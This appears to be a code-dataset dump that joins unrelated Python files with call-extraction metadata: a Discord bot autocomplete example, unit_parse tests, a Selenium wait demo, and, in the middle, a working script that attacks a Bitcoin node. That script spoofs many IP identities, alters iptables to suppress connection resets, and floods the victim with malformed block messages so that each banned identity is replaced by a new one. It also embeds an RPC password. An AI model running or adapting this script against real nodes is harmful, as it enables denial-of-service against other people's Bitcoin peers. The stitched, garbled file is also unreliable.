(['pitch'], {}), '(pitch)\n', (704, 711), False, 'from math import cos, sin\n'), ((864, 874), 'math.sin', 'sin', (['pitch'], {}), '(pitch)\n', (867, 874), False, 'from math import cos, sin\n'), ((877, 885), 'math.sin', 'sin', (['yaw'], {}), '(yaw)\n', (880, 885), False, 'from math import cos, sin\n'), ((2945, 2956), 'time.time', 'time.time', ([], {}), '()\n', (2954, 2956), False, 'import time\n')] |
import discord
from discord.commands import option
bot = discord.Bot(debug_guilds=[...])
COLORS = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"]
LOTS_OF_COLORS = [
"aliceblue",
"antiquewhite",
"aqua",
"aquamarine",
"azure",
"beige",
"bisque",
"blueviolet",
"brown",
"burlywood",
"cadetblue",
"cornflowerblue",
"cornsilk",
"crimson",
"cyan",
"darkblue",
"deepskyblue",
"dimgray",
"dimgrey",
"dodgerblue",
"firebrick",
"floralwhite",
"forestgreen",
"fuchsia",
"gainsboro",
"ghostwhite",
"gold",
"goldenrod",
"gray",
"green",
"greenyellow",
"grey",
"honeydew",
"hotpink",
"indianred",
"indigo",
"ivory",
"khaki",
"lavender",
"lavenderblush",
"lawngreen",
"lightcoral",
"maroon",
"mediumaquamarine",
"mediumblue",
"mediumorchid",
"midnightblue",
"navajowhite",
"navy",
"oldlace",
"olive",
"olivedrab",
"orange",
"orangered",
"orchid",
"palegoldenrod",
"palegreen",
"plum",
"powderblue",
"purple",
"red",
"rosybrown",
"royalblue",
"saddlebrown",
"sienna",
"springgreen",
"steelblue",
"tan",
"teal",
"thistle",
"tomato",
"turquoise",
"violet",
"wheat",
"white",
"whitesmoke",
"yellow",
"yellowgreen",
]
BASIC_ALLOWED = [...] # This would normally be a list of discord user IDs for the purpose of this example
async def color_searcher(ctx: discord.AutocompleteContext):
"""
Returns a list of matching colors from the LOTS_OF_COLORS list.
In this example, we've added logic to only display any results in the
returned list if the user's ID exists in the BASIC_ALLOWED list.
This is to demonstrate passing a callback in the discord.utils.basic_autocomplete function.
"""
return [color for color in LOTS_OF_COLORS if ctx.interaction.user.id in BASIC_ALLOWED]
async def get_colors(ctx: discord.AutocompleteContext):
"""Returns a list of colors that begin with the characters entered so far."""
return [color for color in COLORS if color.startswith(ctx.value.lower())]
async def get_animals(ctx: discord.AutocompleteContext):
"""Returns a list of animals that are (mostly) the color selected for the "color" option."""
picked_color = ctx.options["color"]
if picked_color == "red":
return ["cardinal", "ladybug"]
elif picked_color == "orange":
return ["clownfish", "tiger"]
elif picked_color == "yellow":
return ["goldfinch", "banana slug"]
elif picked_color == "green":
return ["tree frog", "python"]
elif picked_color == "blue":
return ["blue jay", "blue whale"]
elif picked_color == "indigo":
return ["eastern indigo snake"] # Needs to return an iterable even if only one item
elif picked_color == "violet":
return ["purple emperor butterfly", "orchid dottyback"]
else:
return ["rainbowfish"]
@bot.slash_command(name="ac_example")
@option("color", description="Pick a color!", autocomplete=get_colors)
@option("animal", description="Pick an animal!", autocomplete=get_animals)
async def autocomplete_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
Demonstrates using ctx.options to create options
that are dependent on the values of other options.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, the callback uses the input
from the color option to return an iterable of animals
"""
await ctx.respond(f"You picked {color} for the color, which allowed you to choose {animal} for the animal.")
@bot.slash_command(name="ac_basic_example")
@option(
"color",
description="Pick a color from this big list!",
autocomplete=discord.utils.basic_autocomplete(color_searcher),
# Demonstrates passing a callback to discord.utils.basic_autocomplete
)
@option(
"animal",
description="Pick an animal from this small list",
autocomplete=discord.utils.basic_autocomplete(["snail", "python", "cricket", "orca"]),
# Demonstrates passing a static iterable discord.utils.basic_autocomplete
)
async def autocomplete_basic_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
This demonstrates using the discord.utils.basic_autocomplete helper function.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, a static iterable is passed.
While a small amount of values for `animal` are used in this example,
iterables of any length can be passed to discord.utils.basic_autocomplete
Note that the basic_autocomplete function itself will still only return a maximum of 25 items.
"""
await ctx.respond(f"You picked {color} as your color, and {animal} as your animal!")
bot.run("TOKEN")
| [
"discord.commands.option",
"discord.utils.basic_autocomplete",
"discord.Bot"
]
| [((58, 89), 'discord.Bot', 'discord.Bot', ([], {'debug_guilds': '[...]'}), '(debug_guilds=[...])\n', (69, 89), False, 'import discord\n'), ((3109, 3178), 'discord.commands.option', 'option', (['"""color"""'], {'description': '"""Pick a color!"""', 'autocomplete': 'get_colors'}), "('color', description='Pick a color!', autocomplete=get_colors)\n", (3115, 3178), False, 'from discord.commands import option\n'), ((3180, 3253), 'discord.commands.option', 'option', (['"""animal"""'], {'description': '"""Pick an animal!"""', 'autocomplete': 'get_animals'}), "('animal', description='Pick an animal!', autocomplete=get_animals)\n", (3186, 3253), False, 'from discord.commands import option\n'), ((3982, 4030), 'discord.utils.basic_autocomplete', 'discord.utils.basic_autocomplete', (['color_searcher'], {}), '(color_searcher)\n', (4014, 4030), False, 'import discord\n'), ((4203, 4275), 'discord.utils.basic_autocomplete', 'discord.utils.basic_autocomplete', (["['snail', 'python', 'cricket', 'orca']"], {}), "(['snail', 'python', 'cricket', 'orca'])\n", (4235, 4275), False, 'import discord\n')] |
from _thread import start_new_thread
from bitcoin.messages import *
from bitcoin.net import CAddress
from bitcoin.core import CBlock
from io import BytesIO as _BytesIO
import atexit
import bitcoin
import fcntl
import hashlib
import json
import os
import random
import re
import socket
import struct
import sys
import time
import datetime
if os.geteuid() != 0:
sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n")
# Specify the attacker's genuine IP
attacker_ip = input('\nEnter attacker\'s IP address: ')
# Specify the victim's IP, and port (8333 for Bitcoin)
victim_ip = input('Enter victim\'s IP address: ')
victim_port = 8333
# How many identities should run simultaneously
num_identities = 8
# While attacking the victim, wait this many seconds between packets sent to it
seconds_between_version_packets = 0.1
identity_interface = [] # Keeps the IP alias interface and IP for each successful connection
identity_address = [] # Keeps the IP and port for each successful connection
identity_socket = [] # Keeps the socket for each successful connection
# The file where the iptables backup is saved, then restored when the script ends
iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules'
# Send commands to the Linux terminal
def terminal(cmd):
return os.popen(cmd).read()
# Send commands to the Bitcoin Core Console
def bitcoin(cmd):
return os.popen('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=<KEY>GW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 ' + cmd).read()
# Generate a random identity using the broadcast address template
def random_ip():
# By forcing the IP to be above a certain threshhold, it prevents a lot of errors
minimum_ip_range = min(int(attacker_ip.split('.')[-1]), int(victim_ip.split('.')[-1])) + 1
while(True):
ip = broadcast_address
old_ip = ''
while(old_ip != ip):
old_ip = ip
ip = ip.replace('255', str(random.randint(minimum_ip_range, 255)), 1)
# Don't accept already assigned IPs
if ip == default_gateway: continue
if ip == victim_ip: continue
if ip not in [x[0] for x in identity_address]: break
return ip
#return f'10.0.{str(random.randint(0, 255))}.{str(random.randint(0, 255))}'
# Checking the internet by sending a single ping to Google
#def internet_is_active():
# return os.system('ping -c 1 google.com') == 0
# If all else fails, we can use this to recover the network
#def reset_network():
# print('Resetting network...')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} down')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} up')
# Create an alias for a specified identity
def ip_alias(ip_address):
global alias_num
print(f'Setting up IP alias {ip_address} on {network_interface}')
interface = f'{network_interface}:{alias_num}'
terminal(f'sudo ifconfig {interface} {ip_address} netmask 255.255.255.0 broadcast {broadcast_address} up')
alias_num += 1
return interface
# Construct a block packet using python-bitcoinlib
def block_packet_bytes():
hashPrevBlock = bytearray(random.getrandbits(8) for _ in range(32))
hashMerkleRoot = bytearray(random.getrandbits(8) for _ in range(32))
nTime = int((datetime.datetime.now() - datetime.datetime(1970, 1, 1)).total_seconds())#.to_bytes(8, 'little')
nNonce = random.getrandbits(32)
msg = CBlock(
nVersion=bitcoin_protocolversion,
hashPrevBlock=hashPrevBlock,
#hashPrevBlock='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
hashMerkleRoot=hashMerkleRoot,
#hashMerkleRoot='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
nTime=nTime,
nBits=0,
nNonce=nNonce,
vtx=()
)
name = 'block'
f = _BytesIO()
msg.stream_serialize(f)
body = f.getvalue()
res = b'\xf9\xbe\xb4\xd9'
res += name.encode()
res += b"\x00" * (12 - len(name))
res += struct.pack(b"<I", len(body))
#th = hashlib.sha256(body).digest() # add checksum
#h = hashlib.sha256(th).digest()
#res += h[:4]
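	# Note: the real double-SHA256 checksum above is left disabled; four random bytes are appended instead, so peers will reject the message as malformed.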
res += bytearray(random.getrandbits(8) for _ in range(4))
res += body
return res
# Construct a version packet using python-bitcoinlib
def version_packet(src_ip, dst_ip, src_port, dst_port):
msg = msg_version(bitcoin_protocolversion)
msg.nVersion = bitcoin_protocolversion
msg.addrFrom.ip = src_ip
msg.addrFrom.port = src_port
msg.addrTo.ip = dst_ip
msg.addrTo.port = dst_port
# Default is /python-bitcoinlib:0.11.0/
msg.strSubVer = bitcoin_subversion.encode() # Look like a normal node
return msg
# Close a connection
def close_connection(socket, ip, port, interface):
socket.close()
terminal(f'sudo ifconfig {interface} {ip} down')
if socket in identity_socket: identity_socket.remove(socket)
else: del socket
if interface in identity_interface: identity_interface.remove(interface)
if (ip, port) in identity_address: identity_address.remove((ip, port))
print(f'Successfully closed connection to ({ip} : {port})')
# Creates a fake connection to the victim
def make_fake_connection(src_ip, dst_ip, verbose=True):
src_port = random.randint(1024, 65535)
dst_port = victim_port
print(f'Creating fake identity ({src_ip} : {src_port}) to connect to ({dst_ip} : {dst_port})...')
interface = ip_alias(src_ip)
identity_interface.append(interface)
if verbose: print(f'Successfully set up IP alias on interface {interface}')
if verbose: print('Resulting ifconfig interface:')
if verbose: print(terminal(f'ifconfig {interface}').rstrip() + '\n')
if verbose: print('Setting up iptables configurations')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST -j DROP')
if verbose: print('Creating network socket...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if verbose: print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
while success == -1:
print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
time.sleep(1)
print(network_interface)
if verbose: print(f'Binding socket to ({src_ip} : {src_port})...')
s.bind((src_ip, src_port))
if verbose: print(f'Connecting ({src_ip} : {src_port}) to ({dst_ip} : {dst_port})...')
try:
s.connect((dst_ip, dst_port))
except:
close_connection(s, src_ip, src_port, interface)
make_fake_connection(random_ip(), dst_ip, False)
return
# Send version packet
version = version_packet(src_ip, dst_ip, src_port, dst_port)
s.send(version.to_bytes())
# Get verack packet
verack = s.recv(1924)
# Send verack packet
verack = msg_verack(bitcoin_protocolversion)
s.send(verack.to_bytes())
# Get verack packet
verack = s.recv(1024)
if verbose: print('Connection successful!')
identity_address.append((src_ip, src_port))
identity_socket.append(s)
# Listen to the connections for future packets
if verbose: print('Attaching attacker script {interface}')
try:
start_new_thread(attack, (), {
'socket': s,
'src_ip': src_ip,
'src_port': src_port,
'dst_ip': dst_ip,
'dst_port': dst_port,
'interface': interface
})
except:
print('Error: unable to start thread to sniff interface {interface}')
# Repeatedly send malformed block messages until the victim bans this identity
def attack(socket, src_ip, src_port, dst_ip, dst_port, interface):
block = block_packet_bytes()
while True:
if seconds_between_version_packets != 0:
time.sleep(seconds_between_version_packets)
try:
socket.send(block)
except Exception as e:
print(e)
break
close_connection(socket, src_ip, src_port, interface)
print(f'Peer was banned ({src_ip} : {src_port})')
make_fake_connection(random_ip(), dst_ip, False)
# Initialize the network
def initialize_network_info():
print('Retrieving network info...')
global default_gateway, network_interface, broadcast_address
# Get the network interface of the default gateway
m = re.search(r'default +via +([^ ]+) +dev +([^ ]+)', terminal('ip route'))
if m != None:
default_gateway = m.group(1).strip()
network_interface = m.group(2).strip()
else:
print('Error: Network interface couldn\'t be found.')
sys.exit()
# Get the broadcast address of the network interface
# Used as an IP template of what can change, so that packets still come back to the sender
m = re.search(r'broadcast ([^ ]+)', terminal(f'ifconfig {network_interface}'))
if m != None:
broadcast_address = m.group(1).strip()
else:
print('Error: Network broadcast IP couldn\'t be found.')
sys.exit()
# Initialize Bitcoin info
def initialize_bitcoin_info():
print('Retrieving bitcoin info...')
global bitcoin_subversion
global bitcoin_protocolversion
bitcoin_subversion = '/Satoshi:0.18.0/'
bitcoin_protocolversion = 70015
try:
network_info = None #json.loads(bitcoin('getnetworkinfo'))
		if network_info and 'subversion' in network_info:
			bitcoin_subversion = network_info['subversion']
		if network_info and 'protocolversion' in network_info:
			bitcoin_protocolversion = network_info['protocolversion']
except:
pass
# Save a backup of the iptables rules
def backup_iptables():
terminal(f'iptables-save > {iptables_file_path}')
# Restore the backup of the iptable rules
def cleanup_iptables():
if(os.path.exists(iptables_file_path)):
print('Cleaning up iptables configuration')
terminal(f'iptables-restore < {iptables_file_path}')
os.remove(iptables_file_path)
# Remove all ip aliases that were created by the script
def cleanup_ipaliases():
for i in range(0, len(identity_address)):
try:
ip = identity_address[i][0]
interface = identity_interface[i]
print(f'Cleaning up IP alias {ip} on {interface}')
terminal(f'sudo ifconfig {interface} {ip} down')
except: pass
# This function is ran when the script is stopped
def on_close():
print('Closing open sockets')
for socket in identity_socket:
socket.close()
cleanup_ipaliases()
cleanup_iptables()
print('Cleanup complete. Goodbye.')
#print('Verifying that internet works...')
#if not internet_is_active():
# reset_network()

# This is the first code to run
if __name__ == '__main__':
    global alias_num
    alias_num = 0  # Increments each alias

    initialize_network_info()
    initialize_bitcoin_info()

    atexit.register(on_close)  # Make on_close() run when the script terminates
    cleanup_iptables()  # Restore any pre-existing iptables before backing up, in case the computer shut down without restoring them
    backup_iptables()

    # Create the connections
    for i in range(1, num_identities + 1):
        try:
            make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip)
        except ConnectionRefusedError:
            print('Connection was refused. The victim\'s node must not be running.')
    print(f'Successful connections: {len(identity_address)}\n')

    # Prevent the script from terminating when the sniff function is still active
    while 1:
        time.sleep(60)
| [
"datetime.datetime",
"os.path.exists",
"socket.send",
"bitcoin.core.CBlock",
"socket.socket",
"atexit.register",
"io.BytesIO",
"os.geteuid",
"time.sleep",
"os.getcwd",
"datetime.datetime.now",
"os.popen",
"random.getrandbits",
"socket.close",
"sys.exit",
"random.randint",
"_thread.start_new_thread",
"os.remove"
]
| [((342, 354), 'os.geteuid', 'os.geteuid', ([], {}), '()\n', (352, 354), False, 'import os\n'), ((362, 493), 'sys.exit', 'sys.exit', (['"""\nYou need to have root privileges to run this script.\nPlease try again, this time using \'sudo\'. Exiting.\n"""'], {}), '(\n """\nYou need to have root privileges to run this script.\nPlease try again, this time using \'sudo\'. Exiting.\n"""\n )\n', (370, 493), False, 'import sys\n'), ((3435, 3457), 'random.getrandbits', 'random.getrandbits', (['(32)'], {}), '(32)\n', (3453, 3457), False, 'import random\n'), ((3465, 3614), 'bitcoin.core.CBlock', 'CBlock', ([], {'nVersion': 'bitcoin_protocolversion', 'hashPrevBlock': 'hashPrevBlock', 'hashMerkleRoot': 'hashMerkleRoot', 'nTime': 'nTime', 'nBits': '(0)', 'nNonce': 'nNonce', 'vtx': '()'}), '(nVersion=bitcoin_protocolversion, hashPrevBlock=hashPrevBlock,\n hashMerkleRoot=hashMerkleRoot, nTime=nTime, nBits=0, nNonce=nNonce, vtx=())\n', (3471, 3614), False, 'from bitcoin.core import CBlock\n'), ((3948, 3958), 'io.BytesIO', '_BytesIO', ([], {}), '()\n', (3956, 3958), True, 'from io import BytesIO as _BytesIO\n'), ((4812, 4826), 'socket.close', 'socket.close', ([], {}), '()\n', (4824, 4826), False, 'import socket\n'), ((5276, 5303), 'random.randint', 'random.randint', (['(1024)', '(65535)'], {}), '(1024, 65535)\n', (5290, 5303), False, 'import random\n'), ((6168, 6217), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (6181, 6217), False, 'import socket\n'), ((9772, 9806), 'os.path.exists', 'os.path.exists', (['iptables_file_path'], {}), '(iptables_file_path)\n', (9786, 9806), False, 'import os\n'), ((10758, 10783), 'atexit.register', 'atexit.register', (['on_close'], {}), '(on_close)\n', (10773, 10783), False, 'import atexit\n'), ((6629, 6642), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (6639, 6642), False, 'import time\n'), ((7548, 7699), '_thread.start_new_thread', 'start_new_thread', (['attack', '()', "{'socket': s, 'src_ip': src_ip, 'src_port': src_port, 'dst_ip': dst_ip,\n 'dst_port': dst_port, 'interface': interface}"], {}), "(attack, (), {'socket': s, 'src_ip': src_ip, 'src_port':\n src_port, 'dst_ip': dst_ip, 'dst_port': dst_port, 'interface': interface})\n", (7564, 7699), False, 'from _thread import start_new_thread\n'), ((8718, 8728), 'sys.exit', 'sys.exit', ([], {}), '()\n', (8726, 8728), False, 'import sys\n'), ((9080, 9090), 'sys.exit', 'sys.exit', ([], {}), '()\n', (9088, 9090), False, 'import sys\n'), ((9912, 9941), 'os.remove', 'os.remove', (['iptables_file_path'], {}), '(iptables_file_path)\n', (9921, 9941), False, 'import os\n'), ((10395, 10409), 'socket.close', 'socket.close', ([], {}), '()\n', (10407, 10409), False, 'import socket\n'), ((11386, 11400), 'time.sleep', 'time.sleep', (['(60)'], {}), '(60)\n', (11396, 11400), False, 'import time\n'), ((1270, 1281), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1279, 1281), False, 'import os\n'), ((1373, 1386), 'os.popen', 'os.popen', (['cmd'], {}), '(cmd)\n', (1381, 1386), False, 'import os\n'), ((1465, 1698), 'os.popen', 'os.popen', (["('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=<KEY>GW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 '\n + cmd)"], {}), "(\n './../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=<KEY>GW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame 
-rpcport=8332 '\n + cmd)\n", (1473, 1698), False, 'import os\n'), ((3202, 3223), 'random.getrandbits', 'random.getrandbits', (['(8)'], {}), '(8)\n', (3220, 3223), False, 'import random\n'), ((3272, 3293), 'random.getrandbits', 'random.getrandbits', (['(8)'], {}), '(8)\n', (3290, 3293), False, 'import random\n'), ((4246, 4267), 'random.getrandbits', 'random.getrandbits', (['(8)'], {}), '(8)\n', (4264, 4267), False, 'import random\n'), ((7997, 8040), 'time.sleep', 'time.sleep', (['seconds_between_version_packets'], {}), '(seconds_between_version_packets)\n', (8007, 8040), False, 'import time\n'), ((8051, 8069), 'socket.send', 'socket.send', (['block'], {}), '(block)\n', (8062, 8069), False, 'import socket\n'), ((2076, 2113), 'random.randint', 'random.randint', (['minimum_ip_range', '(255)'], {}), '(minimum_ip_range, 255)\n', (2090, 2113), False, 'import random\n'), ((3328, 3351), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (3349, 3351), False, 'import datetime\n'), ((3354, 3383), 'datetime.datetime', 'datetime.datetime', (['(1970)', '(1)', '(1)'], {}), '(1970, 1, 1)\n', (3371, 3383), False, 'import datetime\n')] |
import logging
from testing_func import testing_func, test_logger
from unit_parse import logger, Unit, Q
from unit_parse.utils import *
test_logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
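
# split_list (behavior inferred from the cases below): split string items on each
# "chunks" substring, keeping the matched chunk as its own element; items without a
# matching chunk, and non-string items such as Unit, are left unchanged.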
test_split_list = [
# positive control (changes)
    [["fish", "pig", "cow"], ["f", "is", "h", "pig", "cow"], {"chunks": ["is"]}],
[["fish", Unit("g"), "cow"], ["f", "is", "h", Unit("g"), "cow"], {"chunks": ["is"]}],
[["fishpigcow"], ["f", "i", "shpigcow"], {"chunks": ["i"]}],
[["fishpigcow"], ["f", "i", "shpig", "c", "ow"], {"chunks": ["i", "c"]}],
# negative control (no changes)
[["fish"], ["fish"], {"chunks": ["fish"]}],
[["fishpigcow"], ["fishpigcow"], {"chunks": ["z"]}],
[[Unit("g")], [Unit("g")], {"chunks": ["is"]}],
]
testing_func(split_list, test_split_list)
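
# sig_figs (inferred from the cases below): round a number to the requested number
# of significant digits ("sig_digit"), preserving its sign.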
test_round_off = [ # [Input, Output]
# positive control (works)
[234.2342300000001, 234.23423, {"sig_digit": 15}],
[234.2342399999999999, 234.23424, {"sig_digit": 15}],
[234.2342300000001, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 200, {"sig_digit": 1}],
[-234.2342399999999999, -200, {"sig_digit": 1}],
[-234.2342399999999999, -234.23424, {"sig_digit": 15}],
# negative control (fails)
]
testing_func(sig_figs, test_round_off)
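
# get_list_depth (inferred from the cases below): return how deeply lists are nested;
# scalars and plain strings count as depth 0.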
test_list_depth = [ # [Input, Output]
# positive control (works)
["", 0],
[[], 0],
["asds", 0],
[1, 0],
[["aaa"], 1],
[[["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[[["aaa"], ["aaa"], ["aaa"]]], 3],
# negative control (fails)
]
testing_func(get_list_depth, test_list_depth)
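
# remove_empty_cells (inferred from the cases below): recursively drop empty strings
# and empty lists; returns None when nothing remains.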
test_remove_empty_cells = [ # [Input, Output]
# positive control (works)
[[], None],
[[""], None],
[["asds"], ["asds"]],
[1, 1],
[["aaa", ""], ["aaa"]],
[["aaa", []], ["aaa"]],
[[["aaa", []]], [["aaa"]]],
[[["aaa", [""]]], [["aaa"]]],
# negative control (fails)
]
testing_func(remove_empty_cells, test_remove_empty_cells)
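
# quantity_difference (inferred from the cases below): relative difference between two
# quantities on a 0-1 scale; incomparable inputs appear to give 1.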
examples_quantity_difference = [
[Q("5 g"), Q("0.5"), {"quantity2": Q("10 g")}],
[5, 1, {"quantity2": Q("10 g")}],
]
testing_func(quantity_difference, examples_quantity_difference)
| [
"unit_parse.Unit",
"unit_parse.Q",
"testing_func.test_logger.setLevel",
"testing_func.testing_func",
"unit_parse.logger.setLevel"
]
| [((138, 173), 'testing_func.test_logger.setLevel', 'test_logger.setLevel', (['logging.DEBUG'], {}), '(logging.DEBUG)\n', (158, 173), False, 'from testing_func import testing_func, test_logger\n'), ((174, 204), 'unit_parse.logger.setLevel', 'logger.setLevel', (['logging.DEBUG'], {}), '(logging.DEBUG)\n', (189, 204), False, 'from unit_parse import logger, Unit, Q\n'), ((770, 811), 'testing_func.testing_func', 'testing_func', (['split_list', 'test_split_list'], {}), '(split_list, test_split_list)\n', (782, 811), False, 'from testing_func import testing_func, test_logger\n'), ((1299, 1337), 'testing_func.testing_func', 'testing_func', (['sig_figs', 'test_round_off'], {}), '(sig_figs, test_round_off)\n', (1311, 1337), False, 'from testing_func import testing_func, test_logger\n'), ((1682, 1727), 'testing_func.testing_func', 'testing_func', (['get_list_depth', 'test_list_depth'], {}), '(get_list_depth, test_list_depth)\n', (1694, 1727), False, 'from testing_func import testing_func, test_logger\n'), ((2037, 2094), 'testing_func.testing_func', 'testing_func', (['remove_empty_cells', 'test_remove_empty_cells'], {}), '(remove_empty_cells, test_remove_empty_cells)\n', (2049, 2094), False, 'from testing_func import testing_func, test_logger\n'), ((2223, 2286), 'testing_func.testing_func', 'testing_func', (['quantity_difference', 'examples_quantity_difference'], {}), '(quantity_difference, examples_quantity_difference)\n', (2235, 2286), False, 'from testing_func import testing_func, test_logger\n'), ((2135, 2143), 'unit_parse.Q', 'Q', (['"""5 g"""'], {}), "('5 g')\n", (2136, 2143), False, 'from unit_parse import logger, Unit, Q\n'), ((2145, 2153), 'unit_parse.Q', 'Q', (['"""0.5"""'], {}), "('0.5')\n", (2146, 2153), False, 'from unit_parse import logger, Unit, Q\n'), ((355, 364), 'unit_parse.Unit', 'Unit', (['"""g"""'], {}), "('g')\n", (359, 364), False, 'from unit_parse import logger, Unit, Q\n'), ((391, 400), 'unit_parse.Unit', 'Unit', (['"""g"""'], {}), "('g')\n", (395, 400), False, 'from unit_parse import logger, Unit, Q\n'), ((722, 731), 'unit_parse.Unit', 'Unit', (['"""g"""'], {}), "('g')\n", (726, 731), False, 'from unit_parse import logger, Unit, Q\n'), ((735, 744), 'unit_parse.Unit', 'Unit', (['"""g"""'], {}), "('g')\n", (739, 744), False, 'from unit_parse import logger, Unit, Q\n'), ((2169, 2178), 'unit_parse.Q', 'Q', (['"""10 g"""'], {}), "('10 g')\n", (2170, 2178), False, 'from unit_parse import logger, Unit, Q\n'), ((2208, 2217), 'unit_parse.Q', 'Q', (['"""10 g"""'], {}), "('10 g')\n", (2209, 2217), False, 'from unit_parse import logger, Unit, Q\n')] |
from functools import partial

from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import (
    WebDriverWait
)


# esperar_elemento ("wait for element"): predicate for WebDriverWait that
# returns True once at least one element matches the given CSS selector.
def esperar_elemento(elemento, webdriver):
    print(f'Tentando encontrar "{elemento}"')  # "Trying to find ..."
    if webdriver.find_elements_by_css_selector(elemento):
        return True
    return False


esperar_botao = partial(esperar_elemento, 'button')     # wait for a <button>
esperar_sucesso = partial(esperar_elemento, '#finished')  # wait for the #finished element

url = 'https://selenium.dunossauro.live/aula_09_a.html'

driver = Firefox()
wdw = WebDriverWait(driver, 10)
driver.get(url)

wdw.until(esperar_botao, 'Deu ruim')  # timeout message: "it went wrong"

driver.find_element_by_css_selector('button').click()

wdw.until(
    esperar_sucesso,
    'A mensagem de sucesso não apareceu'  # "The success message did not appear"
)

sucesso = driver.find_element_by_css_selector('#finished')
assert sucesso.text == 'Carregamento concluído'  # "Loading finished"
| [
"selenium.webdriver.support.ui.WebDriverWait",
"selenium.webdriver.Firefox",
"functools.partial"
]
| [((337, 372), 'functools.partial', 'partial', (['esperar_elemento', '"""button"""'], {}), "(esperar_elemento, 'button')\n", (344, 372), False, 'from functools import partial\n'), ((391, 429), 'functools.partial', 'partial', (['esperar_elemento', '"""#finished"""'], {}), "(esperar_elemento, '#finished')\n", (398, 429), False, 'from functools import partial\n'), ((497, 506), 'selenium.webdriver.Firefox', 'Firefox', ([], {}), '()\n', (504, 506), False, 'from selenium.webdriver import Firefox\n'), ((514, 539), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['driver', '(10)'], {}), '(driver, 10)\n', (527, 539), False, 'from selenium.webdriver.support.ui import WebDriverWait\n')] |